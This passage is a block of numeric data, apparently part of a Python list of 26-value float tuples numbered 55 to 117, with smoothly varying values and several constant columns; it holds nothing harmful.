(14.497050855203032, 13.093982910379516, 11.833704846822133, 12.759842785493827, 10.490852950286511, 5.104166666666667, 5.382432623255064, 4.6351594650205765, 5.551838991769547, 2.555094021490627, 1.9206662821631961, 1.101438424020729, 0.0, 14.175, 12.115822664228014, 9.603331410815981, 7.66528206447188, 11.103677983539095, 6.4892232510288075, 5.382432623255064, 3.6458333333333335, 5.2454264751432556, 4.253280928497944, 2.3667409693644266, 1.1903620827617745, 0.0), # 55
(14.501319285952622, 13.045885196616371, 11.820397005029724, 12.74765165895062, 10.492254161082082, 5.104166666666667, 5.3641150528524175, 4.603792695473252, 5.5464777983539095, 2.5460449291266585, 1.918834241592884, 1.099664045115074, 0.0, 14.175, 12.096304496265812, 9.59417120796442, 7.638134787379974, 11.092955596707819, 6.445309773662553, 5.3641150528524175, 3.6458333333333335, 5.246127080541041, 4.249217219650207, 2.3640794010059447, 1.1859895633287612, 0.0), # 56
(14.505238138138138, 12.997766358024693, 11.807012345679016, 12.735311458333335, 10.493539545942102, 5.104166666666667, 5.34580697167756, 4.572944444444445, 5.541071666666667, 2.5370415432098774, 1.9169704264870937, 1.097879423868313, 0.0, 14.175, 12.076673662551439, 9.584852132435467, 7.61112462962963, 11.082143333333335, 6.402122222222224, 5.34580697167756, 3.6458333333333335, 5.246769772971051, 4.245103819444446, 2.3614024691358035, 1.1816151234567904, 0.0), # 57
(14.508806297601952, 12.949710893918612, 11.79357007315958, 12.72283514660494, 10.494708933552829, 5.104166666666667, 5.3275415920277585, 4.5427011316872425, 5.535627510288066, 2.5281026840420675, 1.9150762335287033, 1.096087120865722, 0.0, 14.175, 12.05695832952294, 9.575381167643515, 7.584308052126201, 11.071255020576132, 6.35978158436214, 5.3275415920277585, 3.6458333333333335, 5.2473544667764145, 4.240945048868314, 2.3587140146319165, 1.1772464449016922, 0.0), # 58
(14.51202265018642, 12.901803303612255, 11.780089391860999, 12.710235686728396, 10.495762152600523, 5.104166666666667, 5.309352126200275, 4.513149176954733, 5.530152242798355, 2.5192471719250125, 1.9131530594005905, 1.0942896966925775, 0.0, 14.175, 12.037186663618352, 9.565765297002951, 7.557741515775036, 11.06030448559671, 6.3184088477366265, 5.309352126200275, 3.6458333333333335, 5.247881076300262, 4.2367452289094665, 2.3560178783722, 1.172891209419296, 0.0), # 59
(14.51488608173391, 12.854128086419754, 11.76658950617284, 12.697526041666668, 10.496699031771435, 5.104166666666667, 5.291271786492374, 4.484375000000001, 5.524652777777779, 2.5104938271604946, 1.9112023007856345, 1.0924897119341568, 0.0, 14.175, 12.017386831275722, 9.556011503928172, 7.5314814814814826, 11.049305555555557, 6.278125000000001, 5.291271786492374, 3.6458333333333335, 5.248349515885717, 4.232508680555557, 2.353317901234568, 1.1685570987654323, 0.0), # 60
(14.517395478086781, 12.806769741655238, 11.753089620484685, 12.684719174382717, 10.497519399751823, 5.104166666666667, 5.273333785201324, 4.4564650205761325, 5.519136028806585, 2.501861470050298, 1.9092253543667126, 1.0906897271757356, 0.0, 14.175, 11.997586998933091, 9.546126771833563, 7.5055844101508935, 11.03827205761317, 6.2390510288065855, 5.273333785201324, 3.6458333333333335, 5.248759699875912, 4.22823972479424, 2.350617924096937, 1.1642517946959308, 0.0), # 61
(14.519549725087407, 12.759812768632832, 11.739608939186102, 12.671828047839508, 10.498223085227952, 5.104166666666667, 5.255571334624385, 4.429505658436215, 5.513608909465021, 2.4933689208962058, 1.9072236168267036, 1.0888923030025914, 0.0, 14.175, 11.977815333028504, 9.536118084133516, 7.4801067626886155, 11.027217818930042, 6.201307921810701, 5.255571334624385, 3.6458333333333335, 5.249111542613976, 4.2239426826131705, 2.3479217878372207, 1.1599829789666212, 0.0), # 62
(14.521347708578144, 12.713341666666667, 11.72616666666667, 12.658865625, 10.498809916886067, 5.104166666666667, 5.238017647058824, 4.4035833333333345, 5.508078333333334, 2.4850350000000003, 1.9051984848484853, 1.0871000000000002, 0.0, 14.175, 11.9581, 9.525992424242425, 7.455105, 11.016156666666667, 6.165016666666668, 5.238017647058824, 3.6458333333333335, 5.249404958443034, 4.219621875000001, 2.345233333333334, 1.1557583333333337, 0.0), # 63
(14.522788314401359, 12.667440935070873, 11.712782007315958, 12.645844868827162, 10.499279723412432, 5.104166666666667, 5.220705934801905, 4.378784465020577, 5.50255121399177, 2.4768785276634664, 1.9031513551149353, 1.0853153787532392, 0.0, 14.175, 11.938469166285628, 9.515756775574676, 7.430635582990398, 11.00510242798354, 6.130298251028808, 5.220705934801905, 3.6458333333333335, 5.249639861706216, 4.215281622942388, 2.342556401463192, 1.151585539551898, 0.0), # 64
(14.523870428399414, 12.62219507315958, 11.69947416552355, 12.63277874228395, 10.499632333493302, 5.104166666666667, 5.2036694101508925, 4.35519547325103, 5.497034465020577, 2.4689183241883863, 1.9010836243089335, 1.0835409998475842, 0.0, 14.175, 11.918950998323425, 9.505418121544666, 7.406754972565158, 10.994068930041154, 6.097273662551442, 5.2036694101508925, 3.6458333333333335, 5.249816166746651, 4.2109262474279845, 2.3398948331047102, 1.1474722793781438, 0.0), # 65
(14.524592936414676, 12.577688580246916, 11.686262345679015, 12.619680208333333, 10.499867575814935, 5.104166666666667, 5.1869412854030505, 4.332902777777779, 5.491535000000001, 2.4611732098765438, 1.898996689113356, 1.0817794238683132, 0.0, 14.175, 11.899573662551441, 9.49498344556678, 7.38351962962963, 10.983070000000001, 6.06606388888889, 5.1869412854030505, 3.6458333333333335, 5.249933787907468, 4.206560069444445, 2.337252469135803, 1.1434262345679016, 0.0), # 66
(14.524954724289511, 12.534005955647004, 11.673165752171926, 12.606562229938273, 10.499985279063587, 5.104166666666667, 5.1705547728556445, 4.311992798353911, 5.486059732510288, 2.453662005029722, 1.8968919462110825, 1.0800332114007012, 0.0, 14.175, 11.88036532540771, 9.484459731055413, 7.360986015089164, 10.972119465020576, 6.036789917695475, 5.1705547728556445, 3.6458333333333335, 5.2499926395317935, 4.202187409979425, 2.3346331504343856, 1.1394550868770006, 0.0), # 67
(14.524708260273156, 12.491002420461081, 11.660140274919984, 12.593323827495976, 10.499886091610856, 5.104071942793273, 5.154460636380753, 4.292367245846671, 5.480574329370524, 2.446367154576509, 1.894733397326088, 1.078295169221637, 0.0, 14.174825210048013, 11.861246861438005, 9.47366698663044, 7.339101463729525, 10.961148658741047, 6.009314144185339, 5.154460636380753, 3.6457656734237665, 5.249943045805428, 4.197774609165326, 2.3320280549839967, 1.135545674587371, 0.0), # 68
(14.522398389694043, 12.44736508363202, 11.646819830246914, 12.579297690217391, 10.498983297022512, 5.1033231138545965, 5.13818772694263, 4.272974279835392, 5.474838991769548, 2.439082236746551, 1.8923013290802768, 1.0765088802252547, 0.0, 14.17344039351852, 11.8415976824778, 9.461506645401384, 7.317246710239651, 10.949677983539097, 5.982163991769549, 5.13818772694263, 3.6452307956104257, 5.249491648511256, 4.193099230072464, 2.329363966049383, 1.1315786439665476, 0.0), # 69
(14.517840102582454, 12.402893656798973, 11.633146504915409, 12.564391480475042, 10.49719935985368, 5.101848358989992, 5.121662094192959, 4.253638926992837, 5.468821349641823, 2.4317718335619576, 1.8895680735227522, 1.0746659888174948, 0.0, 14.170705268347055, 11.82132587699244, 9.447840367613761, 7.295315500685872, 10.937642699283646, 5.955094497789972, 5.121662094192959, 3.6441773992785653, 5.24859967992684, 4.188130493491681, 2.326629300983082, 1.127535786981725, 0.0), # 70
(14.511097524900102, 12.357614716359132, 11.619125100022863, 12.548627178945251, 10.49455687350386, 5.0996715769953775, 5.104891161677292, 4.234367588782199, 5.462530365035819, 2.4244361257699243, 1.8865437198495683, 1.072767842674817, 0.0, 14.166655842764062, 11.800446269422984, 9.43271859924784, 7.273308377309771, 10.925060730071637, 5.928114624295079, 5.104891161677292, 3.642622554996698, 5.24727843675193, 4.182875726315085, 2.323825020004573, 1.1234195196690122, 0.0), # 71
(14.502234782608697, 12.311554838709677, 11.604760416666666, 12.532026766304348, 10.49107843137255, 5.096816666666667, 5.087882352941177, 4.215166666666667, 5.4559750000000005, 2.4170752941176477, 1.8832383572567788, 1.0708157894736845, 0.0, 14.161328125, 11.778973684210527, 9.416191786283894, 7.251225882352942, 10.911950000000001, 5.901233333333334, 5.087882352941177, 3.6405833333333337, 5.245539215686275, 4.177342255434784, 2.3209520833333337, 1.1192322580645162, 0.0), # 72
(14.491316001669949, 12.264740600247798, 11.590057255944217, 12.514612223228664, 10.486786626859248, 5.0933075267997765, 5.070643091530164, 4.196042562109436, 5.4491642165828384, 2.409689519352323, 1.8796620749404376, 1.0688111768905575, 0.0, 14.154758123285324, 11.75692294579613, 9.398310374702186, 7.229068558056968, 10.898328433165677, 5.8744595869532095, 5.070643091530164, 3.638076804856983, 5.243393313429624, 4.171537407742889, 2.3180114511888434, 1.1149764182043456, 0.0), # 73
(14.478405308045566, 12.21719857737068, 11.575020418952905, 12.496405530394526, 10.481704053363458, 5.089168056190623, 5.053180800989806, 4.177001676573693, 5.4421069768328, 2.402278982221147, 1.8758249620965999, 1.0667553526018982, 0.0, 14.146981845850483, 11.734308878620878, 9.379124810482999, 7.20683694666344, 10.8842139536656, 5.84780234720317, 5.053180800989806, 3.635120040136159, 5.240852026681729, 4.165468510131509, 2.315004083790581, 1.1106544161246077, 0.0), # 74
(14.463566827697262, 12.168955346475506, 11.559654706790123, 12.477428668478263, 10.475853304284678, 5.084422153635118, 5.03550290486565, 4.158050411522635, 5.434812242798353, 2.394843863471315, 1.8717371079213185, 1.0646496642841674, 0.0, 14.138035300925928, 11.711146307125839, 9.358685539606592, 7.184531590413944, 10.869624485596706, 5.821270576131688, 5.03550290486565, 3.63173010973937, 5.237926652142339, 4.159142889492755, 2.311930941358025, 1.10626866786141, 0.0), # 75
(14.44686468658675, 12.12003748395947, 11.543964920553272, 12.457703618156202, 10.469256973022405, 5.079093717929179, 5.017616826703247, 4.139195168419449, 5.427288976527969, 2.3873843438500235, 1.8674086016106486, 1.0624954596138265, 0.0, 14.127954496742113, 11.68745005575209, 9.337043008053241, 7.162153031550069, 10.854577953055937, 5.794873235787229, 5.017616826703247, 3.6279240842351275, 5.234628486511203, 4.152567872718735, 2.3087929841106543, 1.101821589450861, 0.0), # 76
(14.428363010675731, 12.070471566219748, 11.527955861339734, 12.43725236010467, 10.461937652976141, 5.07320664786872, 4.9995299900481465, 4.120442348727329, 5.4195461400701115, 2.3799006041044684, 1.8628495323606438, 1.0602940862673376, 0.0, 14.116775441529496, 11.663234948940712, 9.314247661803218, 7.139701812313404, 10.839092280140223, 5.768619288218261, 4.9995299900481465, 3.623719034191943, 5.230968826488071, 4.145750786701558, 2.305591172267947, 1.0973155969290682, 0.0), # 77
(14.408125925925928, 12.020284169653527, 11.511632330246915, 12.416096875000001, 10.45391793754539, 5.066784842249657, 4.981249818445898, 4.101798353909466, 5.41159269547325, 2.372392824981845, 1.8580699893673582, 1.0580468919211612, 0.0, 14.10453414351852, 11.638515811132772, 9.29034994683679, 7.1171784749455345, 10.8231853909465, 5.742517695473253, 4.981249818445898, 3.6191320301783265, 5.226958968772695, 4.138698958333334, 2.3023264660493834, 1.092753106332139, 0.0), # 78
(14.386217558299041, 11.969501870657995, 11.494999128372202, 12.394259143518521, 10.445220420129644, 5.0598521998679065, 4.962783735442051, 4.0832695854290515, 5.403437604785855, 2.3648611872293506, 1.8530800618268455, 1.0557552242517592, 0.0, 14.091266610939643, 11.613307466769347, 9.265400309134227, 7.094583561688051, 10.80687520957171, 5.716577419600672, 4.962783735442051, 3.61418014276279, 5.222610210064822, 4.131419714506174, 2.2989998256744406, 1.0881365336961817, 0.0), # 79
(14.362702033756786, 11.918151245630337, 11.478061056812987, 12.371761146336556, 10.435867694128408, 5.052432619519382, 4.9441391645821575, 4.064862444749277, 5.395089830056394, 2.35730587159418, 1.847889838935161, 1.0534204309355928, 0.0, 14.07700885202332, 11.587624740291517, 9.239449194675805, 7.071917614782539, 10.790179660112788, 5.690807422648988, 4.9441391645821575, 3.6088804425138443, 5.217933847064204, 4.123920382112186, 2.2956122113625974, 1.0834682950573036, 0.0), # 80
(14.337643478260873, 11.866258870967743, 11.460822916666668, 12.348624864130437, 10.425882352941176, 5.04455, 4.925323529411765, 4.046583333333334, 5.386558333333333, 2.34972705882353, 1.8425094098883579, 1.0510438596491232, 0.0, 14.061796875, 11.561482456140352, 9.212547049441788, 7.049181176470589, 10.773116666666667, 5.665216666666669, 4.925323529411765, 3.60325, 5.212941176470588, 4.11620828804348, 2.2921645833333337, 1.0787508064516131, 0.0), # 81
(14.311106017773009, 11.813851323067393, 11.443289509030638, 12.32487227757649, 10.415286989967456, 5.036228240105676, 4.906344253476426, 4.0284386526444145, 5.3778520766651425, 2.342124929664596, 1.83694886388249, 1.048626858068812, 0.0, 14.045666688100141, 11.53489543875693, 9.18474431941245, 7.026374788993786, 10.755704153330285, 5.63981411370218, 4.906344253476426, 3.5973058857897686, 5.207643494983728, 4.1082907591921645, 2.2886579018061277, 1.0739864839152178, 0.0), # 82
(14.283153778254908, 11.760955178326475, 11.425465635002288, 12.300525367351046, 10.40410419860674, 5.027491238632323, 4.887208760321688, 4.01043480414571, 5.368980022100289, 2.3344996648645746, 1.8312182901136123, 1.0461707738711208, 0.0, 14.028654299554185, 11.507878512582325, 9.156091450568061, 7.0034989945937225, 10.737960044200578, 5.614608725803994, 4.887208760321688, 3.5910651704516594, 5.20205209930337, 4.1001751224503495, 2.2850931270004575, 1.0691777434842251, 0.0), # 83
(14.253850885668278, 11.707597013142175, 11.407356095679013, 12.275606114130436, 10.392356572258533, 5.0183628943758585, 4.867924473493101, 3.9925781893004118, 5.359951131687243, 2.3268514451706617, 1.825327777777778, 1.0436769547325107, 0.0, 14.010795717592593, 11.480446502057614, 9.12663888888889, 6.980554335511984, 10.719902263374486, 5.589609465020577, 4.867924473493101, 3.5845449245541845, 5.196178286129267, 4.091868704710146, 2.281471219135803, 1.0643270011947434, 0.0), # 84
(14.223261465974833, 11.653803403911677, 11.388965692158209, 12.250136498590983, 10.380066704322333, 5.008867106132196, 4.8484988165362175, 3.974875209571713, 5.35077436747447, 2.3191804513300527, 1.8192874160710422, 1.041146748329443, 0.0, 13.992126950445819, 11.452614231623869, 9.09643708035521, 6.957541353990157, 10.70154873494894, 5.564825293400398, 4.8484988165362175, 3.577762218665854, 5.190033352161167, 4.083378832863662, 2.2777931384316417, 1.05943667308288, 0.0), # 85
(14.191449645136279, 11.59960092703217, 11.370299225537268, 12.224138501409021, 10.367257188197637, 4.999027772697253, 4.828939212996585, 3.9573322664228017, 5.341458691510441, 2.311486864089944, 1.8131072941894584, 1.0385815023383795, 0.0, 13.97268400634431, 11.424396525722173, 9.065536470947292, 6.934460592269831, 10.682917383020882, 5.540265172991923, 4.828939212996585, 3.57073412335518, 5.183628594098819, 4.074712833803008, 2.274059845107454, 1.0545091751847429, 0.0), # 86
(14.15847954911433, 11.545016158900838, 11.35136149691358, 12.19763410326087, 10.353950617283953, 4.988868792866941, 4.809253086419753, 3.939955761316873, 5.332013065843622, 2.3037708641975314, 1.8067975013290805, 1.035982564435781, 0.0, 13.95250289351852, 11.39580820879359, 9.033987506645403, 6.9113125925925925, 10.664026131687244, 5.515938065843622, 4.809253086419753, 3.563477709190672, 5.1769753086419765, 4.065878034420291, 2.2702722993827162, 1.0495469235364399, 0.0), # 87
(14.124415303870702, 11.490075675914863, 11.332157307384547, 12.170645284822868, 10.340169584980769, 4.97841406543718, 4.789447860351274, 3.9227520957171165, 5.322446452522482, 2.296032632400011, 1.8003681266859632, 1.0333512822981095, 0.0, 13.931619620198905, 11.366864105279202, 9.001840633429817, 6.888097897200032, 10.644892905044964, 5.491852934003963, 4.789447860351274, 3.556010046740843, 5.1700847924903846, 4.056881761607624, 2.2664314614769094, 1.0445523341740786, 0.0), # 88
(14.089321035367092, 11.434806054471437, 11.312691458047555, 12.143194026771337, 10.325936684687594, 4.967687489203883, 4.769530958336696, 3.905727671086725, 5.312767813595489, 2.2882723494445796, 1.7938292594561607, 1.030689003601826, 0.0, 13.910070194615912, 11.337579039620083, 8.969146297280803, 6.864817048333737, 10.625535627190978, 5.4680187395214155, 4.769530958336696, 3.548348206574202, 5.162968342343797, 4.047731342257113, 2.2625382916095114, 1.0395278231337672, 0.0), # 89
(14.053260869565218, 11.379233870967743, 11.292968750000002, 12.115302309782612, 10.311274509803923, 4.956712962962964, 4.749509803921569, 3.8888888888888893, 5.302986111111112, 2.280490196078432, 1.787190988835726, 1.027997076023392, 0.0, 13.887890625, 11.30796783625731, 8.93595494417863, 6.841470588235294, 10.605972222222224, 5.4444444444444455, 4.749509803921569, 3.54050925925926, 5.155637254901961, 4.0384341032608715, 2.2585937500000006, 1.0344758064516133, 0.0), # 90
(14.016298932426789, 11.323385701800964, 11.272993984339278, 12.086992114533015, 10.296205653729254, 4.945514385510339, 4.729391820651443, 3.8722421505868017, 5.293110307117818, 2.2726863530487647, 1.7804634040207143, 1.025276847239269, 0.0, 13.865116919581618, 11.278045319631957, 8.902317020103572, 6.818059059146293, 10.586220614235636, 5.4211390108215225, 4.729391820651443, 3.5325102753645283, 5.148102826864627, 4.0289973715110055, 2.254598796867856, 1.0293987001637241, 0.0), # 91
(13.978499349913523, 11.267288123368292, 11.252771962162782, 12.058285421698875, 10.280752709863094, 4.934115655641925, 4.709184432071869, 3.8557938576436523, 5.2831493636640765, 2.2648610011027737, 1.7736565942071794, 1.0225296649259181, 0.0, 13.841785086591221, 11.247826314185097, 8.868282971035896, 6.79458300330832, 10.566298727328153, 5.398111400701113, 4.709184432071869, 3.524368325458518, 5.140376354931547, 4.019428473899626, 2.2505543924325564, 1.0242989203062085, 0.0), # 92
(13.939926247987117, 11.210967712066907, 11.232307484567903, 12.029204211956525, 10.264938271604938, 4.9225406721536356, 4.688895061728395, 3.839550411522634, 5.273112242798354, 2.2570143209876545, 1.7667806485911755, 1.019756876759801, 0.0, 13.81793113425926, 11.217325644357809, 8.833903242955877, 6.771042962962962, 10.546224485596708, 5.375370576131688, 4.688895061728395, 3.5161004801097393, 5.132469135802469, 4.009734737318842, 2.246461496913581, 1.0191788829151736, 0.0), # 93
(13.900643752609293, 11.154451044293994, 11.211605352652038, 11.999770465982289, 10.248784932354287, 4.910813333841387, 4.6685311331665735, 3.8235182136869392, 5.263007906569121, 2.2491464934506045, 1.7598456563687561, 1.016959830417379, 0.0, 13.793591070816188, 11.186558134591166, 8.79922828184378, 6.747439480351812, 10.526015813138242, 5.3529254991617155, 4.6685311331665735, 3.5077238098867047, 5.124392466177143, 3.9999234886607637, 2.2423210705304077, 1.014041004026727, 0.0), # 94
(13.860715989741754, 11.097764696446747, 11.190670367512576, 11.970006164452498, 10.232315285510639, 4.898957539501094, 4.648100069931951, 3.807703665599757, 5.252845317024844, 2.241257699238818, 1.752861706735976, 1.014139873575113, 0.0, 13.768800904492457, 11.155538609326241, 8.764308533679879, 6.723773097716453, 10.505690634049689, 5.33078513183966, 4.648100069931951, 3.499255385357924, 5.1161576427553195, 3.9900020548175, 2.2381340735025153, 1.0088876996769771, 0.0), # 95
(13.820207085346219, 11.040935244922345, 11.169507330246915, 11.93993328804348, 10.215551924473493, 4.88699718792867, 4.62760929557008, 3.7921131687242804, 5.242633436213992, 2.2333481190994924, 1.7458388888888892, 1.0112983539094653, 0.0, 13.74359664351852, 11.124281893004117, 8.729194444444445, 6.700044357298475, 10.485266872427983, 5.3089584362139925, 4.62760929557008, 3.490712277091907, 5.1077759622367465, 3.9799777626811608, 2.2339014660493834, 1.0037213859020315, 0.0), # 96
(13.779181165384388, 10.983989266117973, 11.148121041952448, 11.909573817431562, 10.198517442642354, 4.8749561779200326, 4.60706623362651, 3.7767531245237014, 5.2323812261850335, 2.2254179337798226, 1.7387872920235496, 1.0084366190968967, 0.0, 13.718014296124831, 11.09280281006586, 8.693936460117747, 6.676253801339467, 10.464762452370067, 5.287454374333182, 4.60706623362651, 3.482111555657166, 5.099258721321177, 3.969857939143855, 2.2296242083904896, 0.9985444787379977, 0.0), # 97
(13.737702355817978, 10.926953336430817, 11.126516303726566, 11.878949733293078, 10.181234433416716, 4.862858408271099, 4.58647830764679, 3.7616299344612103, 5.222097648986434, 2.2174673240270053, 1.7317170053360116, 1.0055560168138682, 0.0, 13.69208987054184, 11.06111618495255, 8.658585026680058, 6.652401972081014, 10.444195297972868, 5.266281908245695, 4.58647830764679, 3.4734702916222133, 5.090617216708358, 3.9596499110976935, 2.2253032607453136, 0.9933593942209834, 0.0), # 98
(13.695834782608697, 10.869854032258065, 11.10469791666667, 11.848083016304349, 10.163725490196079, 4.850727777777779, 4.5658529411764714, 3.7467500000000005, 5.211791666666667, 2.2094964705882356, 1.724638118022329, 1.0026578947368423, 0.0, 13.665859375000002, 11.029236842105265, 8.623190590111644, 6.628489411764706, 10.423583333333333, 5.245450000000001, 4.5658529411764714, 3.4648055555555564, 5.081862745098039, 3.949361005434784, 2.220939583333334, 0.988168548387097, 0.0), # 99
(13.653642571718258, 10.8127179299969, 11.082670681870143, 11.816995647141708, 10.146013206379946, 4.8385881852359915, 4.545197557761102, 3.732119722603262, 5.201472241274196, 2.201505554210711, 1.717560719278556, 0.9997436005422796, 0.0, 13.639358817729768, 10.997179605965075, 8.58780359639278, 6.6045166626321326, 10.402944482548392, 5.224967611644567, 4.545197557761102, 3.456134418025708, 5.073006603189973, 3.938998549047237, 2.2165341363740287, 0.9829743572724456, 0.0), # 100
(13.611189849108369, 10.755571606044516, 11.060439400434387, 11.785709606481484, 10.128120175367815, 4.82646352944165, 4.524519580946234, 3.7177455037341867, 5.191148334857491, 2.1934947556416264, 1.7104948983007466, 0.9968144819066413, 0.0, 13.612624206961591, 10.964959300973053, 8.552474491503732, 6.580484266924878, 10.382296669714982, 5.204843705227861, 4.524519580946234, 3.4474739496011786, 5.064060087683908, 3.928569868827162, 2.2120878800868775, 0.977779236913138, 0.0), # 101
(13.568540740740744, 10.698441636798089, 11.038008873456791, 11.754246875000002, 10.110068990559187, 4.814377709190674, 4.503826434277415, 3.7036337448559675, 5.180828909465021, 2.1854642556281783, 1.7034507442849551, 0.9938718865063897, 0.0, 13.585691550925928, 10.932590751570284, 8.517253721424776, 6.556392766884533, 10.361657818930041, 5.185087242798355, 4.503826434277415, 3.438841220850481, 5.055034495279593, 3.918082291666668, 2.207601774691358, 0.972585603345281, 0.0), # 102
(13.525759372577088, 10.641354598654807, 11.015383902034753, 11.722629433373593, 10.09188224535356, 4.802354623278973, 4.483125541300197, 3.689790847431795, 5.170522927145252, 2.1774142349175616, 1.696438346427236, 0.9909171620179854, 0.0, 13.558596857853223, 10.900088782197837, 8.482191732136178, 6.532242704752683, 10.341045854290504, 5.1657071864045125, 4.483125541300197, 3.4302533023421233, 5.04594112267678, 3.907543144457865, 2.2030767804069504, 0.9673958726049827, 0.0), # 103
(13.482909870579116, 10.58433706801186, 10.992569287265662, 11.690879262278584, 10.073582533150434, 4.790418170502465, 4.462424325560129, 3.6762232129248593, 5.160239349946655, 2.1693448742569736, 1.689467793923642, 0.9879516561178898, 0.0, 13.53137613597394, 10.867468217296787, 8.447338969618208, 6.50803462277092, 10.32047869989331, 5.146712498094804, 4.462424325560129, 3.421727264644618, 5.036791266575217, 3.896959754092862, 2.1985138574531327, 0.9622124607283511, 0.0), # 104
(13.440056360708535, 10.527415621266428, 10.969569830246915, 11.659018342391304, 10.05519244734931, 4.778592249657065, 4.441730210602761, 3.662937242798354, 5.1499871399176955, 2.1612563543936103, 1.682549175970229, 0.9849767164825647, 0.0, 13.50406539351852, 10.83474388130821, 8.412745879851144, 6.48376906318083, 10.299974279835391, 5.128112139917696, 4.441730210602761, 3.4132801783264752, 5.027596223674655, 3.886339447463769, 2.1939139660493834, 0.9570377837514936, 0.0), # 105
(13.39726296892706, 10.470616834815702, 10.946390332075904, 11.627068654388085, 10.036734581349688, 4.766900759538689, 4.4210506199736415, 3.6499393385154706, 5.139775259106843, 2.153148856074666, 1.67569258176305, 0.9819936907884712, 0.0, 13.476700638717421, 10.801930598673183, 8.378462908815248, 6.459446568223997, 10.279550518213686, 5.109915073921659, 4.4210506199736415, 3.4049291139562063, 5.018367290674844, 3.875689551462696, 2.189278066415181, 0.9518742577105185, 0.0), # 106
(13.3545938211964, 10.413967285056863, 10.923035593850026, 11.59505217894525, 10.018231528551063, 4.755367598943252, 4.400392977218323, 3.6372359015394005, 5.129612669562567, 2.145022560047339, 1.6689081004981592, 0.9790039267120707, 0.0, 13.449317879801098, 10.769043193832776, 8.344540502490794, 6.435067680142016, 10.259225339125134, 5.092130262155161, 4.400392977218323, 3.3966911421023225, 5.009115764275531, 3.865017392981751, 2.1846071187700056, 0.9467242986415331, 0.0), # 107
(13.312113043478263, 10.357493548387097, 10.899510416666669, 11.562990896739132, 9.999705882352941, 4.744016666666668, 4.379764705882353, 3.6248333333333345, 5.119508333333334, 2.1368776470588244, 1.662205821371611, 0.9760087719298248, 0.0, 13.421953125000002, 10.736096491228071, 8.311029106858054, 6.4106329411764715, 10.239016666666668, 5.074766666666668, 4.379764705882353, 3.3885833333333344, 4.999852941176471, 3.854330298913045, 2.179902083333334, 0.9415903225806455, 0.0), # 108
(13.26988476173436, 10.301222201203595, 10.87581960162323, 11.530906788446053, 9.98118023615482, 4.732871861504853, 4.359173229511284, 3.612738035360464, 5.109471212467612, 2.1287142978563174, 1.6555958335794598, 0.9730095741181947, 0.0, 13.394642382544584, 10.70310531530014, 8.277979167897298, 6.386142893568951, 10.218942424935223, 5.05783324950465, 4.359173229511284, 3.3806227582177515, 4.99059011807741, 3.8436355961486854, 2.1751639203246462, 0.9364747455639633, 0.0), # 109
(13.227973101926404, 10.245179819903537, 10.851967949817103, 11.498821834742351, 9.962677183356197, 4.721957082253722, 4.3386259716506625, 3.6009564090839814, 5.099510269013869, 2.1205326931870148, 1.6490882263177586, 0.9700076809536419, 0.0, 13.367421660665297, 10.670084490490058, 8.245441131588793, 6.361598079561043, 10.199020538027739, 5.041338972717574, 4.3386259716506625, 3.372826487324087, 4.981338591678099, 3.832940611580785, 2.170393589963421, 0.9313799836275944, 0.0), # 110
(13.186442190016104, 10.189392980884113, 10.827960262345682, 11.46675801630435, 9.944219317356573, 4.711296227709192, 4.318130355846042, 3.5894948559670787, 5.089634465020577, 2.1123330137981124, 1.6426930887825626, 0.9670044401126275, 0.0, 13.340326967592594, 10.6370488412389, 8.213465443912813, 6.336999041394336, 10.179268930041154, 5.02529279835391, 4.318130355846042, 3.3652115912208513, 4.972109658678287, 3.8222526721014507, 2.1655920524691368, 0.9263084528076467, 0.0), # 111
(13.14535615196517, 10.133888260542502, 10.803801340306359, 11.434737313808373, 9.925829231555449, 4.700913196667176, 4.297693805642971, 3.5783597774729468, 5.079852762536198, 2.1041154404368063, 1.6364205101699256, 0.9640011992716131, 0.0, 13.313394311556928, 10.604013191987741, 8.182102550849628, 6.312346321310418, 10.159705525072397, 5.0097036884621255, 4.297693805642971, 3.357795140476554, 4.962914615777724, 3.8115791046027923, 2.160760268061272, 0.9212625691402275, 0.0), # 112
(13.104705913184263, 10.078784894108638, 10.779554132960747, 11.402825576616644, 9.907497301495457, 4.690826978191853, 4.277368174559739, 3.5675806651220205, 5.07019931192069, 2.095906657814456, 1.6302822447690024, 0.9610058425921835, 0.0, 13.286621461180511, 10.571064268514016, 8.151411223845011, 6.287719973443367, 10.14039862384138, 4.9946129311708285, 4.277368174559739, 3.3505906987084666, 4.953748650747729, 3.8009418588722155, 2.15591082659215, 0.9162531721916946, 0.0), # 113
(13.064073257060091, 10.024626385524439, 10.755553287525224, 11.371278892341204, 9.88903379759524, 4.681014596966087, 4.257412745887406, 3.557289901377987, 5.060822216666095, 2.0878603087694745, 1.6242903453264128, 0.9580564200798471, 0.0, 13.25978557982405, 10.538620620878318, 8.121451726632063, 6.263580926308422, 10.12164443333219, 4.980205861929182, 4.257412745887406, 3.3435818549757763, 4.94451689879762, 3.790426297447069, 2.1511106575050447, 0.9113296714113127, 0.0), # 114
(13.023338864205595, 9.97143223830991, 10.731813088158539, 11.340088730440868, 9.870380499362694, 4.671450535207326, 4.2378417551340934, 3.547484881662581, 5.051724990045435, 2.0799888647958276, 1.6184360526663222, 0.9551543846318662, 0.0, 13.232809284324528, 10.506698230950526, 8.09218026333161, 6.239966594387481, 10.10344998009087, 4.966478834327614, 4.2378417551340934, 3.336750382290947, 4.935190249681347, 3.780029576813624, 2.146362617631708, 0.9064938398463556, 0.0), # 115
(12.982451822532688, 9.919124960991017, 10.708287554981187, 11.309199457779725, 9.851509291291528, 4.662112249784464, 4.218623372269525, 3.5381385158577467, 5.042884624972988, 2.072277675457342, 1.6127080506300124, 0.9522943730401906, 0.0, 13.205650163658248, 10.475238103442095, 8.063540253150062, 6.216833026372026, 10.085769249945976, 4.953393922200846, 4.218623372269525, 3.330080178417474, 4.925754645645764, 3.7697331525932425, 2.1416575109962372, 0.9017386328173653, 0.0), # 116
(12.941361219953283, 9.867627062093726, 10.68493070811365, 11.278555441221856, 9.832392057875436, 4.652977197566394, 4.199725767263427, 3.529223713845425, 5.034278114363028, 2.0647120903178457, 1.6070950230587664, 0.949471022096771, 0.0, 13.178265806801516, 10.44418124306448, 8.035475115293831, 6.1941362709535355, 10.068556228726056, 4.940913199383595, 4.199725767263427, 3.3235551411188533, 4.916196028937718, 3.7595184804072863, 2.1369861416227303, 0.8970570056448843, 0.0), # 117
